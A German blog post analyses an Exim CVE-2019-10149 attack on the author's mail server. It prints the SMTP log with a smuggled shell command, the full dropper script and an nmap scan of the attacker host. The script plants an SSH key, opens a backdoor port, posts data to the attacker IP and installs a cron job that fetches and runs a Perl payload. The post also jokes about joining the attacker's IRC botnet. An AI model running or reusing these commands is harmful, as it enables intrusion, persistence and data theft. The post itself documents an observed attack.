Skip to content

email von service.com twink mycron CVE 2019-10149

CVE 2019-10149

CODE:
    <br /> <br /> [1585319348.11][45.148.10.84:44220] HELO service.com<br /> [1585319348.12][45.148.10.84:44220] MAIL FROM: <support@service.com><br /> [1585319348.13][45.148.10.84:44220] RCPT TO: <root+${run{\\\\x2Fbin\\\\x2Fsh\\\    -c\\\    \\\\x22wget\\\\x2045.148.10.84\\\\x2fss\\\\x20-Osxs\\\\x3bchmod\\\\x20\\\\x2bx\\\\x20sxs\\\\x3b.\\\\x2fsxs\\\\x22}}@mail.grospolina.org><br /> [1585319348.15][45.148.10.84:44220] RCPT TO:<root+${run{\\\\x2Fbin\\\\x2Fsh\\\    -c\\\    \\\\x22wget\\\\x2045.148.10.84\\\\x2fss\\\\x20-Osxs\\\\x3bchmod\\\\x20\\\\x2bx\\\\x20sxs\\\\x3b.\\\\x2fsxs\\\\x22}}@grospolina.org><br /> [1585319348.16][45.148.10.84:44220] RCPT TO:<root+${run{\\\\x2Fbin\\\\x2Fsh\\\    -c\\\    \\\\x22wget\\\\x2045.148.10.84\\\\x2fss\\\\x20-Osxs\\\\x3bchmod\\\\x20\\\\x2bx\\\\x20sxs\\\\x3b.\\\\x2fsxs\\\\x22}}@localhost><br /> [1585319348.18][45.148.10.84:44220] DATA<br /> [1585319348.19][45.148.10.84:44220] Received: 1\\r\\nReceived: 2\\r\\nReceived: 3\\r\\nReceived: 4\\r\\nReceived: 5\\r\\nReceived: 6\\r\\nReceived: 7\\r\\nReceived: 8\\r\\nReceived: 9\\r\\nReceived: 10\\r\\nReceived: 11\\r\\nReceived: 12\\r\\nReceived: 13\\r\\nReceived: 14\\r\\nReceived: 15\\r\\nReceived: 16\\r\\nReceived: 17\\r\\nReceived: 18\\r\\nReceived: 19\\r\\nReceived: 20\\r\\nReceived: 21\\r\\nReceived: 22\\r\\nReceived: 23\\r\\nReceived: 24\\r\\nReceived: 25\\r\\nReceived: 26\\r\\nReceived: 27\\r\\nReceived: 28\\r\\nReceived: 29\\r\\nReceived: 30\\r\\nReceived: 31\\r\\n<br /> [1585319348.21][45.148.10.84:44220] QUIT<br />


Das gibts das im fridged

Der Angriff geht weiter.
Wir laden das script ss hrruntrr:

CODE:
    <br />  wget 45.148.10.84/ss<br /> --2020-03-27 17:35:49--  http://45.148.10.84/ss<br /> Verbindungsaufbau zu 45.148.10.84:80 … verbunden.<br /> HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK<br /> Länge: 1337 (1,3K) [text/plain]<br /> Wird in »ss« gespeichert.<br /> <br /> ss                                              100%[=======================================================================================================>]   1,31K  --.-KB/s    in 0s<br /> <br /> 2020-03-27 17:35:50 (172 MB/s) - »ss« gespeichert [1337/1337]<br />

LEEEEEEEEET!!!11

Das gibts auch im KÜHLSCHRANK:
fridged ss

...ansonsten_

CODE:
    <br /> VODKA@SLAPTOP ~<br /> $ cat ss<br /> #!/bin/bash<br /> exists=$(grep -c "^jkl:" /etc/passwd)<br /> if [ $exists -eq 0 ]; then<br /> chattr -isa /root/.ssh/authorized_keys<br /> echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys<br /> /usr/sbin/sshd -p 322<br /> /sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1<br /> /sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1<br /> /sbin/iptables-save >/dev/null 2>&1<br /> /usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1<br /> /usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1<br /> /usr/sbin/iptables-save >/dev/null 2>&1<br /> data2=`netstat -natp |grep sshd|base64`<br /> wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null<br /> cd /tmp<br /> echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink<br /> echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink<br /> echo '<strong> </strong> <strong> </strong> * /tmp/twink' >mycron<br /> crontab -l >> mycron<br /> chmod +x /tmp/twink<br /> crontab mycron;rm -fr mycron<br /> else<br /> exit<br /> fi<br />
...und schliesslich lädt er einen perl ircbot herunter,
der sich nach 45.148.10.84 ports 21,8080,9999 verbindet.
Ich stell den mal in den KÜHLSCHRANK:
Jericho Perl IRCbot
Nehmt doch den nick "adolf", der ist nicht in der Liste. :-)
channel: #root

Hier noch ein Einblick:

PORT STATE SERVICE VERSION

21/tcp open irc UnrealIRCd

|_ftp-bounce: ERROR: Script execution failed (use -d to debug)

22/tcp open ssh OpenSSH 5.3 (protocol 2.0)

| ssh-hostkey:

| 1024 c8:74:2c:69:1e:8f:31:e2:c2:1f:9a:6a:f9:07:52:68 (DSA)

|_ 2048 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c (RSA)

80/tcp open http Apache httpd 2.2.15 ((CentOS))

| http-methods:

| Supported Methods: GET HEAD POST OPTIONS TRACE

|_ Potentially risky methods: TRACE

|_http-server-header: Apache/2.2.15 (CentOS)

|_http-title: Apache HTTP Server Test Page powered by CentOS

322/tcp open ssh OpenSSH 5.3 (protocol 2.0)

| ssh-hostkey:

| 1024 c8:74:2c:69:1e:8f:31:e2:c2:1f:9a:6a:f9:07:52:68 (DSA)

|_ 2048 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c (RSA)

5432/tcp open irc UnrealIRCd

6969/tcp open irc UnrealIRCd

8080/tcp open irc UnrealIRCd

9999/tcp open irc UnrealIRCd

Trackbacks

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Standard emoticons like :-) and ;-) are converted to images.
Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

BBCode format allowed
Form options